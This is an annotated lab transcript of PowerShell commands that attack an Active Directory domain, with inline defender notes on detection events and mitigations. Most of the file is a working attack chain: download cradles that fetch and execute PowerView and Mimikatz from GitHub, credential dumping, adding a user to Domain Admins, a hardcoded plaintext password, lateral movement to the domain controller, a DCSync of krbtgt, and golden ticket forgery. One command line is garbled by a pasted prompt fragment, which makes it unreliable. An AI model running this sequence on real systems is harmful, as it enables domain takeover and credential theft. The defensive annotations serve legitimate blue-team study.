# Lab transcript of PowerShell commands run against an Active Directory domain
# ("starfleet.local" / "STARFLEET"). The sequence appears to be: load PowerView
# for domain enumeration, load Invoke-Mimikatz for credential access, pivot to a
# domain controller with a recovered account, then DCSync and forge a Kerberos
# ticket. Every command below depends on the live session state of the preceding
# ones (current user, loaded modules, remote session), so order matters.
#
# Defender notes (what each stage looks like from the blue-team side are marked
# inline; nothing here is verified beyond what the commands themselves show):
#  - Each `IEX (New-Object Net.WebClient).DownloadString(...)` is a download
#    cradle: remote code fetched over HTTPS and executed in memory with no
#    integrity check (no hash/signature), so whatever the GitHub repo serves at
#    run time is what runs. Detection: outbound connections from powershell.exe
#    to raw.githubusercontent.com, plus PowerShell script block logging (event
#    4104) and AMSI on the decoded script content.
#  - A plaintext credential is embedded on the `ConvertTo-SecureString` line;
#    it is recoverable from this file, from command history and from 4104 logs.
#    `-AsPlainText -Force` only wraps the string, it does not protect it.

# Weakens the local script execution policy for the session; logged as a
# policy change and a common precursor to script-based tooling.
Set-ExecutionPolicy unrestricted
# Download cradle #1: PowerView (from the "dievus" repo). Note the second
# PowerView load further down uses the same URL, while the two Invoke-Mimikatz
# loads use a different repo ("Nexxsys"); a reviewer should not assume the two
# sources are equivalent or reviewed.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/PowerView.ps1')
# --- Domain enumeration via PowerView (LDAP reads; low-privilege, high-volume
# LDAP queries from a workstation are the detection signal here) ---
get-netuser | select cn
get-netuser | select -ExpandProperty samaccountanme
# Searches user description fields; defenders should audit these fields since
# they are a classic place where credentials get stored.
Find-UserField -SearchField description
Get-NetGroup -UserName s.chisholm
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -OperatingSystem "*Windows 10*"
Get-NetComputer -OperatingSystem "*Windows Server*"
# Share enumeration: generates SMB connections to every host returned above
# (burst of 5140/5145 share-access events across many hosts).
Invoke-ShareFinder
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
# Queries local Administrators group membership on domain hosts (SAMR over
# SMB to each host).
Invoke-EnumerateLocalAdmin
Get-NetGPO
Get-NetGPO | Select displayname
# Reads the ACL on the "engineering" object; misconfigured ACEs here are what
# an ACL audit (e.g., BloodHound-style review) should surface first.
Get-ObjectAcl -SamAccountName "engineering" -ResolveGUIDs
# Download cradle #2: Invoke-Mimikatz (different repo than PowerView above).
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Nexxsys/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
# --- Local credential access. Mitigation: Credential Guard / LSA protection,
# restricted local admin rights; detection: LSASS access from a PowerShell
# process, Mimikatz command strings in 4104 script block logs. ---
Invoke-Mimikatz -Command token::elevate
Invoke-Mimikatz -Command lsadump::sam
Invoke-Mimikatz -Command lsadump::secrets
# Interactive logon as a second account (j.taylor); shows up as a 4624 logon
# with explicit credentials (4648) from this workstation.
runas /user:j.taylor "powershell.exe"
# Privilege escalation via group membership change: adding a user to
# "Domain Admins" is a high-signal event (4728 on the domain controller) and
# should alert regardless of who performs it.
net group "domain admins" j.taylor /add /domain
# Hardcoded plaintext password (see header). Storing credentials this way in a
# script or notes file is itself a finding.
$password = ConvertTo-SecureString "Lexington1776!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("starfleet\j.taylor", $password)
# Lateral movement to the domain controller over WinRM (TCP 5985/5986); the
# following commands run on dc01, not the workstation.
Enter-PSSession -ComputerName dc01 -Credential $cred
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Nexxsys/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
# DCSync: abuses directory replication rights to pull the krbtgt secret.
# Detection: 4662 with the DS-Replication-Get-Changes control access rights
# from a source that is not a domain controller. Mitigation: restrict
# replication rights to DCs only; rotate krbtgt (twice) after compromise.
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:starfleet.local /user:krbtgt"'
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/PowerView.ps1')
# NOTE(review): this line is an extraction artifact — a pasted prompt
# transcript fused with a leftover markdown link fragment. Only the leading
# `Get-DomainSID -Domain STARFLEET.local` is a command; the remainder is not
# valid PowerShell.
Get-DomainSID -Domain STARFLEET.local](<PS C:\Users\s.chisholm.STARFLEET%3E Get-DomainSID -Domain STARFLEET.local
# Golden ticket: forges a TGT from the krbtgt hash (the <DOMAIN SID> and
# <NTLMHash> placeholders are filled from the two commands above). Persistence
# survives password resets of every account except krbtgt itself, which is why
# krbtgt rotation is the recovery step. Detection: TGS requests (4769) for a
# user whose TGT was never issued by a DC (no matching 4768), ticket lifetimes
# exceeding domain policy.
Invoke-Mimikatz -Command '"kerberos::golden /User:administrator /domain:STARFLEET.local /sid:<DOMAIN SID> /krbtgt:<NTLMHash> /ptt"'